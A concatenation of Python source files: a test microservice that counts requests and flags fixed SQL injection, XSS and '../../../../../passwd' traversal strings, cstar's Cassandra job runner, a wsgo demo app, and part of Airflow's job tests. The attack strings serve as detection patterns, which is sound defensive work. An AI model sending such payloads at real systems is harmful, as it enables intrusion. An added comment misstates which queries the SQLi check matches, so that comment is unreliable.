host_stats.incr('attacks')
host_stats.incr('directory_traversal')
def do_POST(self):
"""json api response"""
host_header = self.headers['Host']
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
self.response = {
'data': insert_data(),
'time': time.asctime(),
'hostname': self.server_name,
'ip': self.server_ip,
'remote': self.address_string(),
'hostheader': host_header,
'path': self.path
}
body = json.dumps(self.response)
self.wfile.write(body.encode('utf-8'))
with lock:
stats['Total']['Requests'] += 1
stats['Total']['Sent Bytes'] += len(body)
stats['Total']['Received Bytes'] += int(self.headers['Content-Length'])
stats['Last 30 Seconds']['Requests'] += 1
stats['Last 30 Seconds']['Sent Bytes'] += len(body)
stats['Last 30 Seconds']['Received Bytes'] += int(self.headers['Content-Length'])
if STATSD_HOST:
server_stats.incr('requests')
server_stats.incr('sent_bytes', len(body))
server_stats.incr('received_bytes', int(self.headers['Content-Length']))
host_stats.incr('requests')
host_stats.incr('sent_bytes', len(body))
host_stats.incr('received_bytes', int(self.headers['Content-Length']))
if re.search(';UNION SELECT 1, version() limit 1,1--', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' SQLi attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['SQLi'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['SQLi'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('sqli')
host_stats.incr('attacks')
host_stats.incr('sqli')
if re.search("pwd<script>alert('attacked')</script>", urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' XSS attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['XSS'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['XSS'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('xss')
host_stats.incr('attacks')
host_stats.incr('xss')
if re.search('../../../../../passwd', urllib.parse.unquote(self.path)):
print(time.strftime("%Y-%m-%dT%H:%M:%S") + ' Directory Traversal attack detected')
with lock:
stats['Total']['Attacks'] += 1
stats['Total']['Directory Traversal'] += 1
stats['Last 30 Seconds']['Attacks'] += 1
stats['Last 30 Seconds']['Directory Traversal'] += 1
if STATSD_HOST:
server_stats.incr('attacks')
server_stats.incr('directory_traversal')
host_stats.incr('attacks')
host_stats.incr('directory_traversal')
class stats_httpd(BaseHTTPRequestHandler):
server_name = socket.gethostname()
server_ip = socket.gethostbyname(server_name)
def do_GET(self):
host_header = self.headers['Host']
self.send_response(200)
self.send_header('Content-Type', 'application/json')
self.end_headers()
with lock:
self.response = {
'time': time.asctime(),
'runtime': int(time.time() - START_TIME),
'hostname': self.server_name,
'ip': self.server_ip,
'stats': stats['Total'],
'config': {
'LISTEN_PORT': LISTEN_PORT,
'STATS_PORT': int(STATS_PORT),
'STATSD_HOST': STATSD_HOST,
'STATSD_PORT': STATSD_PORT,
'RESPOND_BYTES': RESPOND_BYTES,
'STOP_SECONDS': STOP_SECONDS,
'STOP_PADDING': STOP_PADDING,
'TOTAL_STOP_SECONDS': STOP_SECONDS + padding,
}
}
body = json.dumps(self.response, indent=2)
self.wfile.write(body.encode('utf-8'))
def statistics_server():
stats_server = ThreadingHTTPServer((HOST_NAME, int(STATS_PORT)), stats_httpd)
stats_server.serve_forever()
def main():
microservice = ThreadingHTTPServer((HOST_NAME, LISTEN_PORT), httpd)
while keep_running():
microservice.handle_request()
if every_30_seconds():
# Print and clear statistics
with lock:
print(json.dumps(stats))
stats['Last 30 Seconds'] = {
'Requests': 0,
'Sent Bytes': 0,
'Received Bytes': 0,
'Attacks': 0,
'SQLi': 0,
'XSS': 0,
'Directory Traversal': 0
}
if STATS_PORT:
stats_thread = threading.Thread(target=statistics_server, daemon=True)
stats_thread.start()
main()
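# Example interaction (editor's illustration, assuming the default LISTEN_PORT=8080):
#   curl http://localhost:8080/                              -> random payload plus request info
#   curl -X POST -d '{"k": "v"}' http://localhost:8080/      -> JSON response, byte counters updated
#   curl "http://localhost:8080/?q=UNION%20SELECT%201"       -> additionally counted as a SQLi attack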
|
job.py
|
# Copyright 2017 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import queue
import time
import socket
import os
import threading
import functools
import cstar.remote
import cstar.endpoint_mapping
import cstar.topology
import cstar.nodetoolparser
import cstar.state
import cstar.strategy
import cstar.jobrunner
import cstar.jobprinter
import cstar.jobwriter
from cstar.exceptions import BadSSHHost, NoHostsSpecified, HostIsDown, \
NoDefaultKeyspace, UnknownHost, FailedExecution
from cstar.output import msg, debug, emph, info, error
MAX_ATTEMPTS = 3
@functools.lru_cache(None)
def ip_lookup(name):
return socket.gethostbyname(name)
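# Editor's note: lru_cache(None) is an unbounded cache, so each hostname is resolved
# at most once per process; repeated lookups during endpoint-mapping parsing hit the
# cache instead of DNS.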
class Job(object):
"""The class that wires all the business logic together.
    Currently polluted by some business logic of its own. The job handling and some small snippets of code
should be moved out of this class.
"""
def __init__(self):
self._connections = {}
self.results = queue.Queue()
self.handled_finished_jobs = set()
self.state = None
self.command = None
self.job_id = None
self.timeout = None
self.env = None
self.errors = []
self.do_loop = False
self.job_runner = None
self.key_space = None
self.output_directory = None
self.is_preheated = False
self.sleep_on_new_runner = None
self.sleep_after_done = None
self.ssh_username = None
self.ssh_password = None
self.ssh_identity_file = None
self.jmx_username = None
self.jmx_password = None
self.returned_jobs = list()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.close()
if exc_type:
if exc_type == NoHostsSpecified:
error("No hosts specified")
elif exc_type in [BadSSHHost, NoDefaultKeyspace, HostIsDown, UnknownHost]:
error(exc_value)
def get_cluster_topology(self, seed_nodes):
count = 0
tried_hosts = []
for host in seed_nodes:
tried_hosts.append(host)
conn = self._connection(host)
describe_res = self.run_nodetool(conn, "describecluster")
topology_res = self.run_nodetool(conn, "ring")
if (describe_res.status == 0) and (topology_res.status == 0):
cluster_name = cstar.nodetoolparser.parse_describe_cluster(describe_res.out)
topology = cstar.nodetoolparser.parse_nodetool_ring(topology_res.out, cluster_name, self.reverse_dns_preheat)
return topology
count += 1
if count >= MAX_ATTEMPTS:
break
raise HostIsDown("Could not find any working host while fetching topology. Is Cassandra actually running? Tried the following hosts:",
", ".join(tried_hosts))
def reverse_dns_preheat(self, ips):
if self.is_preheated:
return
self.is_preheated = True
def get_host_by_addr(ip):
try:
socket.gethostbyaddr(ip)
except socket.herror:
pass
def create_lookup_thread(ip):
return threading.Thread(target=lambda: get_host_by_addr(ip))
print("Preheating DNS cache")
threads = [create_lookup_thread(ip) for ip in ips]
for thread in threads:
thread.start()
for thread in threads:
# Don't wait around forever for slow DNS
thread.join(1.0)
print("Preheating done")
def get_keyspaces(self, conn):
cfstats_output = self.run_nodetool(conn, *("cfstats", "|", "grep", "Keyspace"))
return cstar.nodetoolparser.extract_keyspaces_from_cfstats(cfstats_output.out)
def get_endpoint_mapping(self, topology):
clusters = []
failed_hosts = []
mappings = []
for host in topology.get_up():
if host.cluster in clusters:
# We need to fetch keyspaces on one node per cluster, no more.
continue
count = 0
clusters.append(host.cluster)
conn = self._connection(host)
if self.key_space:
keyspaces = [self.key_space]
else:
keyspaces = self.get_keyspaces(conn)
has_error = True
for keyspace in keyspaces:
if not keyspace in ['system', 'system_schema']:
debug("Fetching endpoint mapping for keyspace", keyspace)
res = self.run_nodetool(conn, *("describering", keyspace))
has_error = False
if res.status != 0 and not keyspace.startswith("system"):
has_error = True
break
describering = cstar.nodetoolparser.parse_nodetool_describering(res.out)
range_mapping = cstar.nodetoolparser.convert_describering_to_range_mapping(describering)
mappings.append(cstar.endpoint_mapping.parse(range_mapping, topology, lookup=ip_lookup))
if count >= MAX_ATTEMPTS:
                failed_hosts.append(host)
break
count += 1
if failed_hosts:
raise HostIsDown("Following hosts couldn't be reached: {}".format(', '.join(host.fqdn for host in failed_hosts)))
return cstar.endpoint_mapping.merge(mappings)
def run_nodetool(self, conn, *cmds):
if self.jmx_username and self.jmx_password:
return conn.run(("nodetool", "-u", self.jmx_username, "-pw", self.jmx_password, *cmds))
else:
return conn.run(("nodetool", *cmds))
def setup(self, hosts, seeds, command, job_id, strategy, cluster_parallel, dc_parallel, job_runner,
max_concurrency, timeout, env, stop_after, key_space, output_directory,
ignore_down_nodes, dc_filter,
sleep_on_new_runner, sleep_after_done,
ssh_username, ssh_password, ssh_identity_file, ssh_lib,
jmx_username, jmx_password):
msg("Starting setup")
msg("Strategy:", cstar.strategy.serialize(strategy))
msg("Cluster parallel:", cluster_parallel)
msg("DC parallel:", dc_parallel)
self.command = command
self.job_id = job_id
self.timeout = timeout
self.env = env
self.job_runner = job_runner
self.key_space = key_space
self.output_directory = output_directory or os.path.expanduser("~/.cstar/jobs/" + job_id)
self.sleep_on_new_runner = sleep_on_new_runner
self.sleep_after_done = sleep_after_done
self.ssh_username = ssh_username
self.ssh_password = ssh_password
self.ssh_identity_file = ssh_identity_file
self.ssh_lib = ssh_lib
self.jmx_username = jmx_username
self.jmx_password = jmx_password
if not os.path.exists(self.output_directory):
os.makedirs(self.output_directory)
msg("Loading cluster topology")
if seeds:
current_topology = cstar.topology.Topology([])
for seed in seeds:
current_topology = current_topology | self.get_cluster_topology((seed,))
original_topology = current_topology
if dc_filter:
original_topology = original_topology.with_dc_filter(dc_filter)
else:
current_topology = cstar.topology.Topology()
hosts_ip_set = set(socket.gethostbyname(host) for host in hosts)
for raw_host in hosts:
host = socket.gethostbyname(raw_host)
if host in current_topology:
continue
current_topology = current_topology | self.get_cluster_topology((host,))
original_topology = cstar.topology.Topology(host for host in current_topology if host.ip in hosts_ip_set)
msg("Done loading cluster topology")
debug("Run on hosts", original_topology)
debug("in topology", current_topology)
msg("Generating endpoint mapping")
if strategy is cstar.strategy.Strategy.TOPOLOGY:
endpoint_mapping = self.get_endpoint_mapping(current_topology)
msg("Done generating endpoint mapping")
else:
endpoint_mapping = None
msg("Skipping endpoint mapping because of selected strategy")
self.state = cstar.state.State(original_topology, strategy, endpoint_mapping,
cluster_parallel, dc_parallel, dc_filter=dc_filter,
max_concurrency=max_concurrency, current_topology=current_topology,
stop_after=stop_after, ignore_down_nodes=ignore_down_nodes)
msg("Setup done")
def update_current_topology(self, skip_nodes=()):
new_topology = cstar.topology.Topology()
for cluster in self.state.original_topology.get_clusters():
seeds = self.state.get_idle().with_cluster(cluster).without_hosts(skip_nodes).get_up()
# When using the all strategy, all nodes go to running, so we need to pick some node
seeds = seeds or self.state.current_topology.with_cluster(cluster).get_up()
new_topology = new_topology | self.get_cluster_topology(seeds)
self.state = self.state.with_topology(new_topology)
def wait_for_node_to_return(self, nodes=()):
"""Wait until node returns"""
while True:
try:
self.update_current_topology(nodes)
if self.state.is_healthy():
break
except BadSSHHost as e:
# If the instance used to poll cluster health is down it probably means that machine is rebooting
# State is then NOT healthy, so continue waiting...
debug("SSH to %s failed, instance down?" % (node, ), e)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
time.sleep(5)
def resume(self):
self.update_current_topology()
self.resume_on_running_hosts()
self.run()
def run(self):
self.do_loop = True
cstar.jobwriter.write(self)
if not self.state.is_healthy():
raise HostIsDown(
"Can't run job because hosts are down: " + ", ".join(
host.fqdn for host in self.state.current_topology.get_down()))
while self.do_loop:
self.schedule_all_runnable_jobs()
if self.state.is_done():
self.do_loop = False
self.wait_for_any_job()
self.wait_for_all_jobs()
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
self.print_outcome()
def resume_on_running_hosts(self):
for host in self.state.progress.running:
debug("Resume on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def print_outcome(self):
if self.state.is_done() and not self.errors:
if len(self.state.progress.done) == self.state.stop_after:
cstar.jobwriter.write(self)
msg("Job", self.job_id, "successfully ran on", self.state.stop_after, "hosts.\nTo finish the job, run",
emph("cstar continue %s" % (self.job_id,)))
msg("Job", self.job_id, "finished successfully")
else:
msg("Job", self.job_id, "finished with errors.\n"
"%s nodes finished successfully\n"
"%s nodes had errors\n"
"%s nodes didn't start executing"
% (len(self.state.progress.done),
len(self.state.progress.failed),
len(self.state.original_topology) - len(self.state.progress.done) - len(self.state.progress.failed)))
def wait_for_all_jobs(self):
while self.state.progress.running:
host, result = self.results.get()
self.returned_jobs.append((host, result))
if self.results.empty():
self.handle_finished_jobs(self.returned_jobs)
self.returned_jobs = list()
def wait_for_any_job(self):
if self.do_loop:
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
while not self.results.empty():
host, result = self.results.get(timeout=self.timeout)
self.returned_jobs.append((host, result))
self.handle_finished_jobs(self.returned_jobs)
self.wait_for_node_to_return(returned_job[0] for returned_job in self.returned_jobs)
self.returned_jobs = list()
def handle_finished_jobs(self, finished_jobs):
debug("Processing ", len(finished_jobs), " finished jobs")
for finished_job in finished_jobs:
host = finished_job[0]
result = finished_job[1]
if result.status != 0:
self.errors.append((host, result))
self.state = self.state.with_failed(host)
msg("Failure on host", host.fqdn)
if result.out:
msg("stdout:", result.out)
if result.err:
msg("stderr:", result.err)
self.do_loop = False
else:
self.state = self.state.with_done(host)
info("Host %s finished successfully" % (host.fqdn,))
if result.out:
info("stdout:", result.out, sep="\n")
if result.err:
info("stderr:", result.err)
if self.sleep_after_done:
debug("Sleeping %d seconds..." % self.sleep_after_done)
time.sleep(self.sleep_after_done)
cstar.jobwriter.write(self)
# Signal the jobrunner that it can delete the remote job files and terminate.
for finished_job in finished_jobs:
host, result = finished_job
self.handled_finished_jobs.add(host)
def schedule_all_runnable_jobs(self):
while True:
next_host = self.state.find_next_host()
if not next_host:
if not self.state.progress.running:
self.do_loop = False
break
if (not next_host.is_up) and self.state.ignore_down_nodes:
self.state = self.state.with_done(next_host)
else:
self.state = self.state.with_running(next_host)
self.schedule_job(next_host)
cstar.jobwriter.write(self)
cstar.jobprinter.print_progress(self.state.original_topology,
self.state.progress,
self.state.current_topology.get_down())
def schedule_job(self, host):
debug("Running on host", host.fqdn)
threading.Thread(target=self.job_runner(self, host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib),
name="cstar %s" % host.fqdn).start()
time.sleep(self.sleep_on_new_runner)
def _connection(self, host):
if host not in self._connections:
self._connections[host] = cstar.remote.Remote(host, self.ssh_username, self.ssh_password, self.ssh_identity_file, self.ssh_lib)
return self._connections[host]
def close(self):
for name, conn in self._connections.items():
if conn:
conn.close()
self._connections = {}
|
wsgi.py
|
import datetime
import functools
import gc
import hashlib
import sys
import time
import threading
def blah(func):
@functools.wraps(func)
def inner(*args, **kwargs):
print("work it")
return func(*args, **kwargs)
return inner
import wsgo
@wsgo.cron(-2, -1, -1, -1, -1)
@blah
def every_two_minutes():
print("hey")
@wsgo.timer(4)
def yep():
print("sometimes")
def application(env, start_response):
#time.sleep(0.01)
# def func():
# print("Thread starting!")
# time.sleep(2)
# print("Thread finishing!")
# threading.Thread(target=func).start()
h = hashlib.md5()
n = 0
while True:
to_read = 100000
data = env['wsgi.input'].read(to_read)
h.update(data)
#if n==0:
# print(data[:1000])
n += len(data)
if len(data)<to_read:
break
#print(n, h.hexdigest())
#env['wsgi.errors'].write('reporting an error!\n')
#env['wsgi.errors'].flush()
#gc.collect()
#print(sys._debugmallocstats())
start_response('200 OK', [
#('Content-Type','text/html'),
('SomeHeader', 'yeah'),
('X-sendfile', 'go.mod'),
])
return [("The time is %s!"%(datetime.datetime.now())).encode('utf-8')]
data = {'hi':'there'}
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from parameterized import parameterized
import airflow.example_dags
from airflow import AirflowException, models, settings
from airflow import configuration
from airflow.bin import cli
from airflow.exceptions import DagConcurrencyLimitReached, NoAvailablePoolSlot
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BackfillJob, BaseJob, LocalTaskJob, SchedulerJob
from airflow.models import DAG, DagBag, DagModel, DagRun, Pool, SlaMiss, \
TaskInstance as TI, errors
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import create_session
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.compat import MagicMock, Mock, PropertyMock, patch
from tests.compat import mock
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
from tests.test_utils.db import clear_db_dags, clear_db_errors, clear_db_pools, \
clear_db_runs, clear_db_sla_miss
from tests.test_utils.decorators import mock_conf_get
configuration.load_test_config()
logger = logging.getLogger(__name__)
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super().__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def _get_dummy_dag(self, dag_id, pool=None):
dag = DAG(
dag_id=dag_id,
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
pool=pool,
dag=dag)
dag.clear()
return dag
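    # Editor's note on the helper below: it counts how many times `method` (a mock)
    # was called with an instance of `class_` as its first positional argument; the
    # concurrency/pool tests use it to check which limit-reached exceptions were
    # passed to log.debug.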
def _times_called_with(self, method, class_):
count = 0
for args in method.call_args_list:
if isinstance(args[0][0], class_):
count += 1
return count
@classmethod
def setUpClass(cls):
cls.dagbag = DagBag(include_examples=True)
def setUp(self):
clear_db_runs()
clear_db_pools()
self.parser = cli.CLIFactory.get_parser()
def test_unfinished_dag_runs_set_to_failed(self):
dag = self._get_dummy_dag('dummy_dag')
dag_run = dag.create_dagrun(
run_id='test',
state=State.RUNNING,
)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
self.assertEquals(State.FAILED, dag_run.state)
def test_dag_run_with_finished_tasks_set_to_success(self):
dag = self._get_dummy_dag('dummy_dag')
dag_run = dag.create_dagrun(
run_id='test',
state=State.RUNNING,
)
for ti in dag_run.get_task_instances():
ti.set_state(State.SUCCESS)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=8),
ignore_first_depends_on_past=True
)
job._set_unfinished_dag_runs_to_failed([dag_run])
dag_run.refresh_from_db()
self.assertEquals(State.SUCCESS, dag_run.state)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
target_dag.sync_to_db()
scheduler = SchedulerJob()
task_instances_list = Mock()
scheduler._process_task_instances(target_dag, task_instances_list=task_instances_list)
self.assertFalse(task_instances_list.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler._process_task_instances(target_dag, task_instances_list=task_instances_list)
self.assertTrue(task_instances_list.append.called)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
end_date = DEFAULT_DATE + datetime.timedelta(days=1)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=end_date,
executor=executor,
ignore_first_depends_on_past=True
)
job.run()
expected_execution_order = [
("runme_0", DEFAULT_DATE),
("runme_1", DEFAULT_DATE),
("runme_2", DEFAULT_DATE),
("runme_0", end_date),
("runme_1", end_date),
("runme_2", end_date),
("also_run_this", DEFAULT_DATE),
("also_run_this", end_date),
("run_after_loop", DEFAULT_DATE),
("run_after_loop", end_date),
("run_this_last", DEFAULT_DATE),
("run_this_last", end_date),
]
self.maxDiff = None
self.assertListEqual(
[((dag.dag_id, task_id, when, 1), State.SUCCESS)
for (task_id, when) in expected_execution_order],
executor.sorted_tasks
)
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == dag.dag_id
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf(
"sqlite" in configuration.conf.get("core", "sql_alchemy_conn"),
"concurrent access not supported in sqlite",
)
@parameterized.expand(
[
[
"example_branch_operator",
(
"run_this_first",
"branching",
"branch_a",
"branch_b",
"branch_c",
"branch_d",
"follow_branch_a",
"follow_branch_b",
"follow_branch_c",
"follow_branch_d",
"join",
),
],
[
"example_bash_operator",
("runme_0", "runme_1", "runme_2", "also_run_this", "run_after_loop", "run_this_last"),
],
[
"example_skip_dag",
(
"always_true_1",
"always_true_2",
"skip_operator_1",
"skip_operator_2",
"all_success",
"one_success",
"final_1",
"final_2",
),
],
["latest_only", ("latest_only", "task1")],
]
)
def test_backfill_examples(self, dag_id, expected_execution_order):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
self.maxDiff = None
dag = self.dagbag.get_dag(dag_id)
logger.info('*** Running example DAG: %s', dag.dag_id)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
executor=executor,
ignore_first_depends_on_past=True)
job.run()
self.assertListEqual(
[((dag_id, task_id, DEFAULT_DATE, 1), State.SUCCESS)
for task_id in expected_execution_order],
executor.sorted_tasks
)
def test_backfill_conf(self):
dag = self._get_dummy_dag('test_backfill_conf')
executor = TestExecutor()
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_concurrency_limit(self, mock_log):
dag = self._get_dummy_dag('test_backfill_respect_concurrency_limit')
dag.concurrency = 2
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
concurrency_limit_reached_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), dag.concurrency)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == dag.concurrency:
concurrency_limit_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(concurrency_limit_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_pool_limit_reached_in_debug)
self.assertGreater(times_concurrency_limit_reached_in_debug, 0)
@patch('airflow.jobs.LoggingMixin.log')
@patch('airflow.jobs.conf.getint')
def test_backfill_with_no_pool_limit(self, mock_getint, mock_log):
non_pooled_backfill_task_slot_count = 2
def getint(section, key):
if section.lower() == 'core' and \
'non_pooled_backfill_task_slot_count' == key.lower():
return non_pooled_backfill_task_slot_count
else:
return configuration.conf.getint(section, key)
mock_getint.side_effect = getint
dag = self._get_dummy_dag('test_backfill_with_no_pool_limit')
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
non_pooled_task_slot_count_reached_at_least_once = False
num_running_task_instances = 0
# if no pool is specified, the number of tasks running in
# parallel per backfill should be less than
# non_pooled_backfill_task_slot_count at any point of time.
for running_task_instances in executor.history:
self.assertLessEqual(
len(running_task_instances),
non_pooled_backfill_task_slot_count,
)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == non_pooled_backfill_task_slot_count:
non_pooled_task_slot_count_reached_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(non_pooled_task_slot_count_reached_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_pool_not_found(self):
dag = self._get_dummy_dag(
dag_id='test_backfill_pool_not_found',
pool='king_pool',
)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
try:
job.run()
except AirflowException:
return
self.fail()
@patch('airflow.jobs.LoggingMixin.log')
def test_backfill_respect_pool_limit(self, mock_log):
session = settings.Session()
slots = 2
pool = Pool(
pool='pool_with_two_slots',
slots=slots,
)
session.add(pool)
session.commit()
dag = self._get_dummy_dag(
dag_id='test_backfill_respect_pool_limit',
pool=pool.pool,
)
executor = TestExecutor()
job = BackfillJob(
dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=7),
)
job.run()
self.assertTrue(0 < len(executor.history))
pool_was_full_at_least_once = False
num_running_task_instances = 0
for running_task_instances in executor.history:
self.assertLessEqual(len(running_task_instances), slots)
num_running_task_instances += len(running_task_instances)
if len(running_task_instances) == slots:
pool_was_full_at_least_once = True
self.assertEquals(8, num_running_task_instances)
self.assertTrue(pool_was_full_at_least_once)
times_concurrency_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
DagConcurrencyLimitReached,
)
times_pool_limit_reached_in_debug = self._times_called_with(
mock_log.debug,
NoAvailablePoolSlot,
)
self.assertEquals(0, times_concurrency_limit_reached_in_debug)
self.assertGreater(times_pool_limit_reached_in_debug, 0)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='test_backfill_run_rescheduled_task-1',
dag=dag,
)
dag.clear()
executor = TestExecutor()
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
ti.set_state(State.UP_FOR_RESCHEDULE)
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
rerun_failed_tasks=True
)
job.run()
ti = TI(task=dag.get_task('test_backfill_run_rescheduled_task-1'),
execution_date=DEFAULT_DATE)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
def test_backfill_rerun_failed_tasks(self):
dag = DAG(
